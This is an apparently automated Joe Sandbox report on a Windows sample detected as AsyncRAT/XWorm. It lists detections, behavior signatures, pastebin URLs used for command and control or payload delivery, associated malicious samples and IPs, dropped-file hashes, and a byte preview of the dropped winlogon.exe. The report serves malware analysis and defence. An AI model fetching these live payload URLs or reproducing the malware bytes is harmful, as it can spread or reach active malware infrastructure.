              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546349 Sample: 1bE8S5sN9S.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 38 pastebin.com 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 54 14 other signatures 2->54 8 1bE8S5sN9S.exe 14 4 2->8         started        13 winlogon.exe 2->13         started        15 winlogon.exe 2->15         started        signatures3 52 Connects to a pastebin service (likely for C&C) 38->52 process4 dnsIp5 40 pastebin.com 104.20.4.235, 443, 49977 CLOUDFLARENETUS United States 8->40 42 108.177.127.147, 49978, 49979, 49980 GOOGLEUS United States 8->42 36 C:\ProgramData\winlogon.exe, PE32 8->36 dropped 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Protects its processes via BreakOnTermination flag 8->58 60 Bypasses PowerShell execution policy 8->60 68 2 other signatures 8->68 17 powershell.exe 23 8->17         started        20 powershell.exe 23 8->20         started        22 powershell.exe 23 8->22         started        24 2 other processes 8->24 62 Antivirus detection for dropped file 13->62 64 Multi AV Scanner detection for dropped file 13->64 66 Machine Learning detection for dropped file 13->66 file6 signatures7 process8 signatures9 44 Loading BitLocker PowerShell Module 17->44 26 conhost.exe 17->26         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 24->34         started        process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              1bE8S5sN9S.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
              1bE8S5sN9S.exe100%AviraTR/Spy.Gen
              1bE8S5sN9S.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\winlogon.exe100%AviraTR/Spy.Gen
              C:\ProgramData\winlogon.exe100%Joe Sandbox ML
              C:\ProgramData\winlogon.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://crl.mic0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              pastebin.com
              		104.20.4.235
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://pastebin.com/raw/QUwdrCNgtrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2204349762.0000027AB6292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311462978.000002291F333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2469821953.00000206D1F82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2673913328.000001FE4ACA1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2534248634.000001FE3AE59000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crl.microsopowershell.exe, 00000008.00000002.2489881208.00000206DA4EF000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2185437882.0000027AA6449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253341668.000002290F4EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2369596674.00000206C2139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2534248634.000001FE3AE59000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2534248634.000001FE3AE59000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://www.microsoft.9Gpowershell.exe, 00000008.00000002.2487241796.00000206DA2E0000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2185437882.0000027AA6449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253341668.000002290F4EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2369596674.00000206C2139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2534248634.000001FE3AE59000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 0000000B.00000002.2673913328.000001FE4ACA1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2204349762.0000027AB6292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2311462978.000002291F333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2469821953.00000206D1F82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2673913328.000001FE4ACA1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2673913328.000001FE4ACA1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.micpowershell.exe, 0000000B.00000002.2709388986.000001FE532FB000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2673913328.000001FE4ACA1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.micft.cMicRosofpowershell.exe, 0000000B.00000002.2709388986.000001FE532FB000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2185437882.0000027AA6221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253341668.000002290F2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2369596674.00000206C1F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2534248634.000001FE3AC31000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name1bE8S5sN9S.exe, 00000000.00000002.3347814438.0000000002611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2185437882.0000027AA6221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253341668.000002290F2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2369596674.00000206C1F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2534248634.000001FE3AC31000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://pastebin.com1bE8S5sN9S.exe, 00000000.00000002.3347814438.00000000026D4000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://pastebin.com1bE8S5sN9S.exe, 00000000.00000002.3347814438.0000000002611000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2534248634.000001FE3AE59000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                104.20.4.235
                                		pastebin.comUnited States
                                		13335CLOUDFLARENETUStrue
                                108.177.127.147
                                		unknownUnited States
                                		15169GOOGLEUSfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1546349
                                Start date and time:2024-10-31 19:48:05 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 10s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:17
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:1bE8S5sN9S.exe
                                renamed because original name is a hash value
                                Original Sample Name:8efa6f0711c60afd3e6cb29df2b740ee4d01b7f4290a223aa85c6f54fb3b9da5.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@18/19@1/2
                                EGA Information:
                                • Successful, ratio: 14.3%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 62
                                • Number of non-executed functions: 7
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 2072 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 2876 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 3504 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 4688 because it is empty
                                • Execution Graph export aborted for target winlogon.exe, PID 4824 because it is empty
                                • Execution Graph export aborted for target winlogon.exe, PID 5856 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • VT rate limit hit for: 1bE8S5sN9S.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                14:49:10API Interceptor63x Sleep call for process: powershell.exe modified
                                14:50:10API Interceptor135x Sleep call for process: 1bE8S5sN9S.exe modified
                                19:50:09Task SchedulerRun new task: winlogon path: C:\ProgramData\winlogon.exe

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                104.20.4.235gabe.ps1Get hashmaliciousUnknownBrowse
                                • pastebin.com/raw/sA04Mwk2
                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                • pastebin.com/raw/sA04Mwk2
                                vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                • pastebin.com/raw/sA04Mwk2
                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                • pastebin.com/raw/sA04Mwk2
                                gaber.ps1Get hashmaliciousUnknownBrowse
                                • pastebin.com/raw/sA04Mwk2
                                cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                • pastebin.com/raw/sA04Mwk2
                                sostener.vbsGet hashmaliciousNjratBrowse
                                • pastebin.com/raw/V9y5Q5vv
                                sostener.vbsGet hashmaliciousXWormBrowse
                                • pastebin.com/raw/V9y5Q5vv
                                envifa.vbsGet hashmaliciousRemcosBrowse
                                • pastebin.com/raw/V9y5Q5vv
                                New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                • pastebin.com/raw/NsQ5qTHr

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                pastebin.comsegura.vbsGet hashmaliciousRemcosBrowse
                                • 104.20.3.235
                                asegurar.vbsGet hashmaliciousRemcosBrowse
                                • 104.20.3.235
                                SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                • 104.20.4.235
                                seethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                • 172.67.19.24
                                BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                DHLShippingInvoicesAwbBL000000000102220242247.vbsGet hashmaliciousRemcosBrowse
                                • 104.20.4.235
                                a1OueQJq4d.exeGet hashmaliciousDCRatBrowse
                                • 172.67.19.24
                                4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dllGet hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                loader.exeGet hashmaliciousXmrigBrowse
                                • 104.20.4.235
                                SecuriteInfo.com.Win64.Evo-gen.31489.1077.exeGet hashmaliciousXmrigBrowse
                                • 172.67.19.24

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 188.114.96.3
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 172.64.41.3
                                gMd6of50Do.exeGet hashmaliciousBlank GrabberBrowse
                                • 162.159.136.232
                                El9HaBFrFM.exeGet hashmaliciousBlank GrabberBrowse
                                • 162.159.128.233
                                aLRjksjY78.exeGet hashmaliciousHackBrowserBrowse
                                • 162.159.136.232
                                jF5cZUXeQm.exeGet hashmaliciousBlank GrabberBrowse
                                • 162.159.135.232
                                https://www.miroslavska.com/pvt/language-prefs?return_url=https:///alrbanyon.com/..&lng=en&return_url=/plain-flange_red.thick./dn-800/glatter-flansch-dn-800:813x20-pn-10-id-8195-mmGet hashmaliciousHTMLPhisherBrowse
                                • 104.17.25.14
                                Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                • 104.26.1.231
                                original.emlGet hashmaliciousMamba2FABrowse
                                • 188.114.96.3
                                https://fcs-aero.com/ilsmart/marketplace/inventory/#ksunya.chan@yogiproducts.comGet hashmaliciousHTMLPhisherBrowse
                                • 188.114.96.3

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0ehttp://amtso.eicar.org/PotentiallyUnwanted.exeGet hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 104.20.4.235
                                file.exeGet hashmaliciousLummaCBrowse
                                • 104.20.4.235
                                Lana_Rhoades_Photoos.jsGet hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.20.4.235
                                https://t.ly/4Nq2xGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                • 104.20.4.235
                                Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918Get hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                RFQ Proposals ADC-24-65.exeGet hashmaliciousMassLogger RATBrowse
                                • 104.20.4.235
                                RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exeGet hashmaliciousMassLogger RATBrowse
                                • 104.20.4.235

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\winlogon.exe

                                Download File
                                Process:C:\Users\user\Desktop\1bE8S5sN9S.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):60416
                                Entropy (8bit):5.885722644983858
                                Encrypted:false
                                SSDEEP:1536:CcG/DG/fDG+wopontVm+4ys9bFKR4F+9E6ywbgOmXvkAq:CcGGfDG+wWoPm+4X9bFKac/0Omfbq
                                MD5:F2A18B995A82E938AB6A067491AA0D79
                                SHA1:D437FCA2F38D712BAFAE8C92169EEC8934699E54
                                SHA-256:8EFA6F0711C60AFD3E6CB29DF2B740EE4D01B7F4290A223AA85C6F54FB3B9DA5
                                SHA-512:73DB4EC0271045F3F2C40FA197CF6300D81F32E4ECDDDF792B475C8234D997C8D9DDFD62F944F230D8929017DFD1F473FBF4470F3BF6C2E92A8606CD3FED6D56
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\winlogon.exe, Author: Joe Security
                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\winlogon.exe, Author: ditekSHen
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 82%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a".g............................>.... ........@.. .......................@............@.....................................S.......>.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...>...........................@..@.reloc....... ......................@..B................ .......H........`..........&.....................................................(....*.r...p*. S...*..(....*.r=..p*. '.Y.*.s.........s.........s.........s.........*.r]..p*. E/..*.r}..p*. ....*.r...p*. *p{.*.r...p*. ....*.r...p*..((...*.r"..p*. ....*.rB..p*. &]z.*"(....+.*"(....+.*&("...&+.*.+5sU... .... .'..oV...(,...~....-.(M...(?...~....oW...&.-.*.rD..p*. .G..*.rd..p*. .l..*.r...p*. .(T.*.r...p*. ....*.r...p*. :...*.r...p*. ....*.r...p*. ..S.*.r$..p*. .O..*..............j........

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\winlogon.exe.log

                                Download File
                                Process:C:\ProgramData\winlogon.exe
                                File Type:CSV text
                                Category:dropped
                                Size (bytes):654
                                Entropy (8bit):5.380476433908377
                                Encrypted:false
                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.34726597513537405
                                Encrypted:false
                                SSDEEP:3:Nlll:Nll
                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                Malicious:false
                                Preview:@...e...........................................................

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1myf0o0d.gpu.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mvbbfge.3nd.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43dicpzh.gxm.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mucf15u.gme.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5g4ddmsf.2ep.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_byxr4s4s.u2u.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3awwud0.cup.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_febcydls.ud2.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsciwpnw.jvg.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1b5t1im.0hv.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
